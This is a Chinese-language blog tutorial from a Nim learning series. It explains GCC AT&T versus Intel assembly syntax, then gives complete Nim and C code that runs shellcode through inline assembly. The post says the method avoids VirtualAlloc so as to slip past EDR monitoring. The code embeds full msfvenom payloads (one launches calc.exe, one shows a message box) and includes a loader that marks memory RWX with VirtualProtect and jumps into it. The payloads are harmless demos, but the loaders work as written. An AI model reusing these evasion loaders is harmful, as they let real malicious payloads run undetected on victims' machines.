nim 内联汇编加载 shellcode(nim学习系列)
nim 内联汇编加载 shellcode
GCC 汇编语法
Linux上的 GNU C 编译器 GCC ,使用 AT&T / UNIX 汇编语法,AT&T 语法和 Intel 语法的差别很大。现在我们看到了 Intel 语法和 AT&T 语法之间的一些主要差别。我仅仅写了它们差别的一部分而已。关于更完整的信息,请参考 GNU 汇编文档。
1.源操作数和目的操作数顺序
AT&T 语法的操作数方向和 Intel 语法的刚好相反。在Intel 语法中,第一操作数为目的操作数,第二操作数为源操作数,然而在 AT&T 语法中,第一操作数为源操作数,第二操作数为目的操作数。也就是说,
2.寄存器命名
寄存器名称有 "%" 前缀,即如果必须使用 "eax",它应该用作 "%eax"。
3.立即数
AT&T 立即数以 "$" 为前缀。静态 "C" 变量也使用 "$" 前缀。在 Intel 语法中,十六进制常量以 "h" 为后缀,然而 AT&T 不使用这种语法,这里我们给常量添加前缀 "0x"。所以,对于十六进制,我们首先看到一个 "$",然后是 "0x",最后才是常量。
Intel 语法中的 "Op-code dst src" 变为 AT&T 语法中的 "Op-code src dst"。
4.操作数大小
在 AT&T 语法中,存储器操作数的大小取决于操作码名字的最后一个字符。操作码后缀 ’b’ 、’w’、’l’ 分别指明了字节(8位)、字(16位)、长型(32位)存储器引用。Intel 语法通过给存储器操作数添加 "byte ptr"、 "word ptr" 和 "dword ptr" 前缀来实现这一功能。
因此,Intel的 "mov al, byte ptr foo" 在 AT&T 语法中为 "movb foo, %al"。
5.存储器操作数
在 Intel 语法中,基址寄存器包含在 "[" 和 "]" 中,然而在 AT&T 中,它们变为 "(" 和 ")"。另外,在 Intel 语法中, 间接内存引用为
"section:[base + index*scale + disp]",在 AT&T中变为 "section:disp(base, index, scale)"。
需要牢记的一点是,当一个常量用于 disp 或 scale,不能添加 "$" 前缀。
扩展汇编
在基本内联汇编中,我们只有指令。然而在扩展汇编中,我们可以同时指定操作数。它允许我们指定输入寄存器、输出寄存器以及修饰寄存器列表。GCC 不强制用户必须指定使用的寄存器。我们可以把头疼的事留给 GCC ,这可能可以更好地适应 GCC 的优化。不管怎么说,基本格式为:
- asm ( 汇编程序模板
- 输出操作数 /* 可选的 */
- 输入操作数 /* 可选的 */
- 修饰寄存器列表 /* 可选的 */
);
例如:
int a=10, b;
asm ("movl %1, %%eax;
movl %%eax, %0;"
:"=r"(b) /* 输出 */
:"r"(a) /* 输入 */
:"%eax" /* 修饰寄存器 */
);
nim 内联汇编的一个例子
nim c -r --cpu:amd64 poc.nim
{.passC:"-masm=intel".}
import winim/lean
proc GetTEBAsm64(): LPVOID{.asmNoStackFrame.} =
asm """
push rbx
xor rbx, rbx
xor rax, rax
mov rbx, qword ptr gs:[0x30]
mov rax, rbx
pop rbx
jno theEnd
theEnd:
ret
"""
var p = GetTEBAsm64()
echo repr(p)
内联汇编加载shellcode
可以在C/C++程序中内联汇编执行shellcode。它不需要你调用“VirtualAlloc” WIN API来分配新的RWX内存,众所周知该API受到EDR的严密监控。代码将嵌入到PE文件的“.text”(代码段),而代码段默认情况下是可执行的。
nim c -r --cpu:amd64 poc.nim
{.passC:"-masm=intel".}
proc runsc(): void =
# msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f csharp
asm """
.byte 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xaa,0xc5,0xe2,0x5d,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00
ret
"""
runsc()
或者
{.emit: """
#include <Windows.h>
#include <stdio.h>
int myThead() {
printf("spotless");
asm(".byte 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xaa,0xc5,0xe2,0x5d,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00\n\t"
"ret\n\t");
return 0;
}
""".}
proc myThead(): cint {.importc:"myThead", nodecl.}
discard myThead()
写成 shellcode 加载器
我这里使用的是AT&T / UNIX 汇编语法,所以没有写 {.passC:"-masm=intel".} 这是跟上面的例子不同的地方。
nim c -r --cpu:i386 poc.nim
import winim
proc myThread(shellcode: openArray[byte]): void =
var shellcodeAddr = GlobalAlloc(GPTR, cast[SIZE_T](len(shellcode)))
var dwProtection: DWORD = 0
VirtualProtect(cast[LPVOID](shellcodeAddr), cast[SIZE_T](len(shellcode)), PAGE_EXECUTE_READWRITE, &dwProtection)
copyMem(cast[pointer](shellcodeAddr), unsafeAddr shellcode, len(shellcode))
#或者这样写
#var dwProtection: DWORD = 0
#VirtualProtect(unsafeAddr shellcode, cast[SIZE_T](len(shellcode)), PAGE_EXECUTE_READWRITE, &dwProtection)
#var shellcodeAddr: pointer = unsafeAddr shellcode
asm """
mov %0, %%eax
push %%eax
ret
:
: "r" (`shellcodeAddr`)
"""
when defined(windows):
# https://github.com/nim-lang/Nim/wiki/Consts-defined-by-the-compiler
when defined(i386):
# ./msfvenom -p windows/messagebox -f csharp, then modified for Nim arrays
echo "[*] Running in x86 process"
var shellcode: array[272, byte] = [
byte 0xd9,0xeb,0x9b,0xd9,0x74,0x24,0xf4,0x31,0xd2,0xb2,0x77,0x31,0xc9,0x64,0x8b,
0x71,0x30,0x8b,0x76,0x0c,0x8b,0x76,0x1c,0x8b,0x46,0x08,0x8b,0x7e,0x20,0x8b,
0x36,0x38,0x4f,0x18,0x75,0xf3,0x59,0x01,0xd1,0xff,0xe1,0x60,0x8b,0x6c,0x24,
0x24,0x8b,0x45,0x3c,0x8b,0x54,0x28,0x78,0x01,0xea,0x8b,0x4a,0x18,0x8b,0x5a,
0x20,0x01,0xeb,0xe3,0x34,0x49,0x8b,0x34,0x8b,0x01,0xee,0x31,0xff,0x31,0xc0,
0xfc,0xac,0x84,0xc0,0x74,0x07,0xc1,0xcf,0x0d,0x01,0xc7,0xeb,0xf4,0x3b,0x7c,
0x24,0x28,0x75,0xe1,0x8b,0x5a,0x24,0x01,0xeb,0x66,0x8b,0x0c,0x4b,0x8b,0x5a,
0x1c,0x01,0xeb,0x8b,0x04,0x8b,0x01,0xe8,0x89,0x44,0x24,0x1c,0x61,0xc3,0xb2,
0x08,0x29,0xd4,0x89,0xe5,0x89,0xc2,0x68,0x8e,0x4e,0x0e,0xec,0x52,0xe8,0x9f,
0xff,0xff,0xff,0x89,0x45,0x04,0xbb,0x7e,0xd8,0xe2,0x73,0x87,0x1c,0x24,0x52,
0xe8,0x8e,0xff,0xff,0xff,0x89,0x45,0x08,0x68,0x6c,0x6c,0x20,0x41,0x68,0x33,
0x32,0x2e,0x64,0x68,0x75,0x73,0x65,0x72,0x30,0xdb,0x88,0x5c,0x24,0x0a,0x89,
0xe6,0x56,0xff,0x55,0x04,0x89,0xc2,0x50,0xbb,0xa8,0xa2,0x4d,0xbc,0x87,0x1c,
0x24,0x52,0xe8,0x5f,0xff,0xff,0xff,0x68,0x6f,0x78,0x58,0x20,0x68,0x61,0x67,
0x65,0x42,0x68,0x4d,0x65,0x73,0x73,0x31,0xdb,0x88,0x5c,0x24,0x0a,0x89,0xe3,
0x68,0x58,0x20,0x20,0x20,0x68,0x4d,0x53,0x46,0x21,0x68,0x72,0x6f,0x6d,0x20,
0x68,0x6f,0x2c,0x20,0x66,0x68,0x48,0x65,0x6c,0x6c,0x31,0xc9,0x88,0x4c,0x24,
0x10,0x89,0xe1,0x31,0xd2,0x52,0x53,0x51,0x52,0xff,0xd0,0x31,0xc0,0x50,0xff,
0x55,0x08]
# This is essentially the equivalent of 'if __name__ == '__main__' in python
when isMainModule:
myThread(shellcode)
以上汇编代码也可以这样写
asm """
mov %0, %%eax
call %%eax
:
: "r" (`shellcodeAddr`)
"""
引用
https://twitter.com/byt3bl33d3r/status/1348824008670597123?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1348824008670597123%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fajpc500.github.io%2Fnim%2FShellcode-Injection-using-Nim-and-Syscalls%2F
https://github.com/byt3bl33d3r/OffensiveNim/blob/master/src/shellcode_inline_asm_bin.nim
https://www.linuxprobe.com/gcc-how-to.html
https://www.ired.team/offensive-security/code-injection-process-injection/executing-shellcode-with-inline-assembly-in-c-c++
https://nim-lang.org/docs/manual.html#statements-and-expressions-assembler-statement
https://github.com/Mr-Un1k0d3r/Shellcoding/blob/master/simple-encoder.c
